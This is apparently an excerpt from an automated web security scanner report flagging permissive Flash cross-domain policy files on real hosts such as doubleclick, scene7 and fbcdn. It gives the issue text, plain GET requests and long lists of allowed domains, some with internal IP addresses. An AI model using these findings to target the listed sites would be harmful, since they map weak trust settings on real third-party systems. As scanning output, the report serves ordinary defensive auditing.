The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 03:47:21 GMT
Expires: Mon, 16 May 2011 03:47:21 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 77543
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.74. http://s7d5.scene7.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: s7d5.scene7.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
ETag: W/"25343-1305036218000"
Accept-Ranges: bytes
Last-Modified: Tue, 10 May 2011 14:03:38 GMT
Content-Type: application/xml
Content-Length: 25343
Expires: Mon, 16 May 2011 05:25:36 GMT
Date: Mon, 16 May 2011 01:35:52 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.laneventure.com"/>
<allow-access-from domain="*.pearsonco.com"/>
<allow-access-from domain="*.targetimg1.com"/>
<allow-access-from domain="*.targetimg2.com"/>
<allow-access-from domain="*.targetimg3.com"/>
<allow-access-from domain="*.agilent.com"/>
<allow-access-from domain="*.artvan.com"/>
<allow-access-from domain="*.mizunogolf.com"/>
<allow-access-from domain="*.talbots.com"/>
<allow-access-from domain="giftadvisor.indelible.tv"/>
<allow-access-from domain="*.taaz.com"/>
<allow-access-from domain="www.flashmaxx.com"/>
<allow-access-from domain="flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.armstrong.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="sassomedia.com"/>
<allow-access-from domain="*.photoshop.com"/>
<allow-access-from domain="kijones.host.adobe.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="*.trex.com"/>
<allow-access-from domain="*.trexco.com"/>
<allow-access-from domain="*.vermontcountrystore.com"/>
<allow-access-from domain="*.pabng.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.k2admin.com"/>
<allow-access-from domain="*.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.shopdeluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.nimblefish.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fossil.com"/>
<allow-access-from domain="www.michele.com"/>
<allow-access-from domain="127.0.0.1" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.polarisindustries.com"/>
<allow-access-from domain="backstage.polarisindustries.com"/>
<allow-access-from domain="s7diod-isorigin.scene7.com"/>
<allow-access-from domain="origin-na1.scene7.com"/>
<allow-access-from domain="origin-na2.scene7.com"/>
<allow-access-from domain="origin-na3.scene7.com"/>
<allow-access-from domain="origin-na4.scene7.com"/>
<allow-access-from domain="origin-na5.scene7.com"/>
<allow-access-from domain="origin-na6.scene7.com"/>
<allow-access-from domain="origin-na7.scene7.com"/>
<allow-access-from domain="origin-na8.scene7.com"/>
<allow-access-from domain="s7d1.scene7.com"/>
<allow-access-from domain="s7d2.scene7.com"/>
<allow-access-from domain="s7d3.scene7.com"/>
<allow-access-from domain="s7d4.scene7.com"/>
<allow-access-from domain="s7ondemand1.scene7.com"/>
<allow-access-from domain="irtex1.scene7.com"/>
<allow-access-from domain="10.80.1.144"/>
<allow-access-from domain="10.80.1.152"/>
<allow-access-from domain="10.80.1.42"/>
<allow-access-from domain="origin-apps.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps.scene7.com"/>
<allow-access-from domain="isstaging.scene7.com"/>
<allow-access-from domain="techservices.scene7.com"/>
<allow-access-from domain="ecomtest1.hancockms.com"/>
<allow-access-from domain="www.hancockfabrics.com"/>
<allow-access-from domain="www.eddiebauer.com"/>
<allow-access-from domain="dev.eddiebauer.com"/>
<allow-access-from domain="qa.eddiebauer.com"/>
<allow-access-from domain="testvipd1.scene7.com"/>
<allow-access-from domain="testvipd2.scene7.com"/>
<allow-access-from domain="testvipd3.scene7.com"/>
<allow-access-from domain="testvipd4.scene7.com"/>
<allow-access-from domain="s7ondemand3.scene7.com"/>
<allow-access-from domain="s7ondemand7.scene7.com"/>
<allow-access-from domain="s7ips1.scene7.com"/>
<allow-access-from domain="s7ondemand5.scene7.com"/>
<allow-access-from domain="*.sample.scene7.com"/>
<allow-access-from domain="origin-search.scene7.com"/>
<allow-access-from domain="staging.scene7.com"/>
<allow-access-from domain="s7testis.adobe.com"/>
<allow-access-from domain="sportstown.crosscomm.net"/>
<allow-access-from domain="sportstown.com"/>
<allow-access-from domain="*.sportstown.com"/>
<allow-access-from domain="www.anthropologie.com"/>
<allow-access-from domain="staging.anthropologie.us"/>
<allow-access-from domain="smartwool.dev.summitprojects.com"/>
<allow-access-from domain="smartwool.stage.summitprojects.com"/>
<allow-access-from domain="www.smartwool.com"/>
...[SNIP]...
<allow-access-from domain="testvipd5.scene7.com"/>
<allow-access-from domain="www.roadrunnersports.com"/>
<allow-access-from domain="dev.atgnow.com"/>
<allow-access-from domain="staging.roadrunnersports.com"/>
<allow-access-from domain="*.sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain=" s7.sears.com "/>
<allow-access-from domain="*.myctmh.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.instrum3nt.com"/>
<allow-access-from domain="*.tommybahama.com"/>
<allow-access-from domain="demo.ml.nurun.com"/>
<allow-access-from domain="trek07.hansondodge.com"/>
<allow-access-from domain="*.dexdealer.com" />
<allow-access-from domain="*.bontrager.com" />
<allow-access-from domain="*.trekbikes.com" />
<allow-access-from domain="*.readyfortheroadahead.com" />
<allow-access-from domain="*.belk.com"/>
<allow-access-from domain="*.sears.com"/>
<allow-access-from domain="*.dayport.com"/>
<allow-access-from domain="eaqa2prod1234.ethanallen.com"/>
<allow-access-from domain="devaws.ethanallen.com"/>
<allow-access-from domain="elm.kharv.com"/>
<allow-access-from domain="serotoninsoftware.com"/>
<allow-access-from domain="*.ethanallen.com"/>
<allow-access-from domain="*.wishbook.com"/>
<allow-access-from domain="*.entriq.net"/>
<allow-access-from domain="test-web1-www.lbiatlanta.com"/>
<allow-access-from domain="*.newellco.com"/>
<allow-access-from domain="preview.graco.com"/>
<allow-access-from domain="*.gracobaby.com"/>
<allow-access-from domain="s.sears.com"/>
<allow-access-from domain="202.44.56.2"/>
<allow-access-from domain="202.44.58.2"/>
<allow-access-from domain="beta.graco.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.ashleyfurniture.com" />
<allow-access-from domain="*.ashleyfurniturehomestore.com" />
<allow-access-from domain="s7sps1-staging.scene7.com" />
<allow-access-from domain="s7sps1.scene7.com" />
<allow-access-from domain="*.lokion.com"/>
<allow-access-from domain="*.vikingrange.com"/>
<allow-access-from domain="www.armstrong.com"/>
<allow-access-from domain="*.classscene.com"/>
<allow-access-from domain="*.classsceneqa.com"/>
<allow-access-from domain="*.classscenedemo.com"/>
<allow-access-from domain="*.fulltiltboots.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.karhuskico.com"/>
<allow-access-from domain="*.k2women.com"/>
<allow-access-from domain="*.k2snowboarding.com"/>
<allow-access-from domain="*.k2skis.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.lineskis.com"/>
<allow-access-from domain="*.5150snowboarding.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.atlassnowshoe.com"/>
<allow-access-from domain="*.tubbssnowshoes.com"/>
<allow-access-from domain="*.k2telemark.com"/>
<allow-access-from domain="*.k2dealertools.com"/>
<allow-access-from domain="*.planet-earth-clothing.com"/>
<allow-access-from domain="*.k2skates.com"/>
<allow-access-from domain="*.k2iceskates.com"/>
<allow-access-from domain="*.snowshoes.com"/>
<allow-access-from domain="*.vashonstorefront.com"/>
<allow-access-from domain="*.adiofootwear.com"/>
<allow-access-from domain="*.adio.com"/>
<allow-access-from domain="4.59.112.138"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.store.americangirl.com"/>
<allow-access-from domain="agpmt-prod:7778"/>
<allow-access-from domain="agpmt-test:7777"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="*.jcpenney.com"/>
<allow-access-from domain="*.teamzonesports.com"/>
<allow-access-from domain="*.underarmour.com"/>
<allow-access-from domain="broadridge.mominc.com"/>
<allow-access-from domain="*.craftsman.com"/>
<allow-access-from domain="*.sothebys.com"/>
<allow-access-from domain="*.facebook.com"/>
<allow-access-from domain="*.thuzi.com"/>
<allow-access-from domain="*.samsclub.com"/>
<allow-access-from domain="161.169.79.10"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.hansondodge.com"/>
<allow-access-from domain="*.thebrick.com"/>
<allow-access-from domain="s7demo.scene7.com"/>
<allow-access-from domain="*.richrelevance.com"/>
<allow-access-from domain="*.hit.homedepot.resource.com"/>
<allow-access-from domain="*.allurent.net"/>
<allow-access-from domain="*.ashro.com"/>
<allow-access-from domain="*.countrydoor.com"/>
<allow-access-from domain="*.ginnys.com"/>
<allow-access-from domain="*.grandpointe.com"/>
<allow-access-from domain="*.monroeandmain.com"/>
<allow-access-from domain="*.midnightvelvet.com"/>
<allow-access-from domain="*.raceteamgear.com"/>
<allow-access-from domain="*.swisscolony.com"/>
<allow-access-from domain="*.seventhavenue.com"/>
<allow-access-from domain="*.homevisions.com"/>
<allow-access-from domain="*.wards.com"/>
<allow-access-from domain="*.tenderfilet.com"/>
<allow-access-from domain="assets.k2sports.com"/>
<allow-access-from domain="assets.ridesnowboards.com"/>
<allow-access-from domain="assets1.k2sports.com"/>
<allow-access-from domain="assets1.ridesnowboards.com"/>
<allow-access-from domain="assets2.k2sports.com"/>
<allow-access-from domain="assets2.ridesnowboards.com"/>
<allow-access-from domain="161.211.2.28"/>
<allow-access-from domain="161.211.155.7"/>
<allow-access-from domain="ah-stg.fry.com"/>
<allow-access-from domain="cd-stg.fry.com"/>
<allow-access-from domain="gn-stg.fry.com"/>
<allow-access-from domain="gp-stg.fry.com"/>
<allow-access-from domain="hv-stg.fry.com"/>
<allow-access-from domain="mm-stg.fry.com"/>
<allow-access-from domain="mv-stg.fry.com"/>
<allow-access-from domain="mw-stg.fry.com"/>
<allow-access-from domain="rt-stg.fry.com"/>
<allow-access-from domain="rc-stg.fry.com"/>
<allow-access-from domain="tf-stg.fry.com"/>
<allow-access-from domain="sc-stg.fry.com"/>
<allow-access-from domain="sa-stg.fry.com"/>
<allow-access-from domain="shopdeluxe-v9-dev.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="shopdeluxe-v9-uat.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="stage.coach.com"/>
<allow-access-from domain="*.coach.com"/>
<allow-access-from domain="demandware.edgesuite.net"/>
<allow-access-from domain="*.buildabear.com"/>
<allow-access-from domain="*.babwtest.com"/>
<allow-access-from domain="customshop.mesfire.com"/>
<allow-access-from domain="stage.homeinspiration.homedepot.com "/>
<allow-access-from domain="homeinspiration.homedepot.com"/>
<allow-access-from domain="pointroll.com"/>
<allow-access-from domain="*.pointroll.com"/>
<allow-access-from domain="*.smartwool.com"/>
<allow-access-from domain="*.summitprojects.com"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="511.niteviewtech.com"/>
<allow-access-from domain="www.lauramercier.com"/>
<allow-access-from domain="*.lumberliquidators.com"/>
<allow-access-from domain="*.ae.com"/>
<allow-access-from domain="*.aezone.com"/>
<allow-access-from domain="s7everest.macromedia.com"/>
<allow-access-from domain="s7fuji.macromedia.com"/>
<allow-access-from domain="s7qa-is.macromedia.com"/>
<allow-access-from domain="officemax.companychecksandforms.com"/>
<allow-access-from domain="www.511deasbf.com"/>
<allow-access-from domain="*.511deasbf.com"/>
<allow-access-from domain="*.vcfcorp.com"/>
...[SNIP]...
<allow-access-from domain="*.asfurniture.com"/>
<allow-access-from domain="*.vcf.com"/>
...[SNIP]...
<allow-access-from domain="anthropologie.uat.venda.com"/>
<allow-access-from domain="anthropologie.live.venda.com"/>
<allow-access-from domain="*.511academy.com"/>
<allow-access-from domain="*.reedkrakoff.com"/>
<allow-access-from domain="stage.wearport.com"/>
<allow-access-from domain="*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.anthropologie.eu"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="www.leadbased.com"/>
<allow-access-from domain="*.mxbi.com"/>
<allow-access-from domain="*.jordans.com"/>
<allow-access-from domain="jordans.com"/>
<allow-access-from domain="jordansqa.weymouthdesign.com"/>
<allow-access-from domain="*.mercury.com"/>
<allow-access-from domain="*.cb2.com"/>
<allow-access-from domain="*.landofnod.com"/>
<allow-access-from domain="*.crateandbarrel.com"/>
<allow-access-from domain="*.crateandbarrel.ca"/>
<allow-access-from domain="cim-dev.deluxe.com"/>
<allow-access-from domain="cim-qa.deluxe.com"/>
<allow-access-from domain="www.deluxe-check-order.com"/>
<allow-access-from domain="wwwpreprod.deluxe-check-order.com"/>
<allow-access-from domain="*.vfimagewear.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.zumiez.com"/>
<allow-access-from domain="zumiez.com"/>
<allow-access-from domain="*.vfc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="service-apps.scene7.com"/>
<allow-access-from domain="service-apps-staging.scene7.com"/>
<allow-access-from domain="walmart.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps-staging.scene7.com"/>
<allow-access-from domain="63.241.188.118"/>
<allow-access-from domain="63.241.188.119"/>
<allow-access-from domain="63.241.188.116"/>
<allow-access-from domain="63.241.188.120"/>
<allow-access-from domain="63.241.188.121"/>
<allow-access-from domain="63.241.188.117"/>
<allow-access-from domain="63.241.188.122"/>
<allow-access-from domain="63.241.188.123"/>
<allow-access-from domain="63.241.188.124"/>
<allow-access-from domain="63.241.188.125"/>
<allow-access-from domain="stage.store.americangirl.com"/>
<allow-access-from domain="*.kohls.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="media.kohls.com.edgesuite.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.edgeboss.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscorporation.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscareers.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlsoncampus.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.apiservice.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="98.129.79.154" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="httpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="rtmpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mixercast.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com"/>
<allow-access-from domain="*.enlighten.com"/>
<allow-access-from domain="*.hunterdouglas.com"/>
<allow-access-from domain=".allurent.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="64.52.70.13"/>
<allow-access-from domain="64.52.70.30"/>
<allow-access-from domain="64.52.70.33"/>
<allow-access-from domain="64.52.70.60"/>
<allow-access-from domain="76.12.61.174"/>
<allow-access-from domain="*.kmart.com"/>
<allow-access-from domain="skavamp.com"/>
<allow-access-from domain="*.skavamp.com"/>
<allow-access-from domain="*.cloudfront.net"/>
<allow-access-from domain="www.grandinroad.com"/>
<allow-access-from domain="www.frontgate.com"/>
<allow-access-from domain="97.65.222.116"/>
<allow-access-from domain="97.65.222.115"/>
<allow-access-from domain="*.neptune.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="*.web.rga.com"/>
<allow-access-from domain="*.ny.rga.com"/>
<allow-access-from domain="content01.nimblefish.com"/>
<allow-access-from domain="cdn.nimblefish.com"/>
<allow-access-from domain="media.nimblefish.com"/>
<allow-access-from domain="nv.nimblefish.com"/>
<allow-access-from domain="app.nimblefish.com"/>
<allow-access-from domain="media.beta01.nimblefish.com"/>
<allow-access-from domain="nv.beta01.nimblefish.com"/>
<allow-access-from domain="app.beta01.nimblefish.com"/>
<allow-access-from domain="media.content01.nimblefish.com"/>
<allow-access-from domain="nv.content01.nimblefish.com"/>
<allow-access-from domain="app.content01.nimblefish.com"/>
<allow-access-from domain="*.511fbileeda.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.hottopic.com"/>
<allow-access-from domain="*.teamworkathletic.com "/>
<allow-access-from domain="*.scene7.com"/>
<allow-access-from domain="*.shopvcf.com"/>
<allow-access-from domain="shopvcf.com"/>
<allow-access-from domain="*.axelscript.com"/>
<allow-access-from domain="*.sherwin.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sherwin-williams.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.resource.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="*.modea.com"/>
<allow-access-from domain="*.mizunousa.com"/>
<allow-access-from domain="*.mizunorunning.com"/>
<allow-access-from domain="*.mizunocda.com"/>
<allow-access-from domain="*.footjoy.com"/>
<allow-access-from domain="*.footjoy.co.uk"/>
<allow-access-from domain="*.footjoy.com.fr"/>
<allow-access-from domain="*.footjoy.de"/>
<allow-access-from domain="*.footjoy.se"/>
<allow-access-from domain="*.footjoy.ca"/>
<allow-access-from domain="*.footjoy.com.au"/>
<allow-access-from domain="*.footjoy.jp"/>
<allow-access-from domain="*.footjoy.co.th"/>
<allow-access-from domain="*.footjoy.com.my"/>
<allow-access-from domain="*.footjoy.com.sg"/>
<allow-access-from domain="*.footjoy.co.kr"/>
<allow-access-from domain="*.footjoy.com.cn"/>
<allow-access-from domain="pitchinteractive.com"/>
<allow-access-from domain="*.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="flashmaxx.com" secure="true" />
...[SNIP]...
<allow-access-from domain="searsfb.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ec2-184-72-166-175.compute-1.amazonaws.com"/>
<allow-access-from domain="*.getpapered.com"/>
<allow-access-from domain="*.englishpapercompany.com"/>
<allow-access-from domain="*.koolsquare.net"/>
<allow-access-from domain="*.target.com"/>
<allow-access-from domain="*.home.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cos.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.lvld.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="cp.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.at" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.be" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ch" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.hu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.il" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.kr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.nz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.th" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ar" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.br" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.cn" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.co" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.hk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.mx" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.my" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pe" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ph" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.sg" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tw" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ve" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.de" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.dk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ee" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.es" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.gr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ie" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.it" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.lu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.nl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.no" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.pt" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.se" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brooksbrothers.com"/>
<allow-access-from domain="*.whitneyenglish.com"/>
<allow-access-from domain="canadiantire.ca"/>
<allow-access-from domain="*.maxnow.com"/>
<allow-access-from domain="4.59.112.158"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="*.converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cust.aops-eds.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="kobe.nike.jess3.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.highschoolsports.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skysports.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lequipe.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovation.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovationdev.digitas.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nikedev.framfab.dk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akqa.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ostkcdn.com"/>
<allow-access-from domain="*.aggregateknowledge.com"/>
<allow-access-from domain="*.nikedev.com"/>
<allow-access-from domain="anthrode.uat.venda.com"/>
<allow-access-from domain="anthropologie.custqa.venda.com"/>
<allow-access-from domain="*.fingerhut.com"/>
<allow-access-from domain="*.gettington.com"/>
...[SNIP]...

6.75. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.186
Date: Sun, 15 May 2011 20:27:09 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
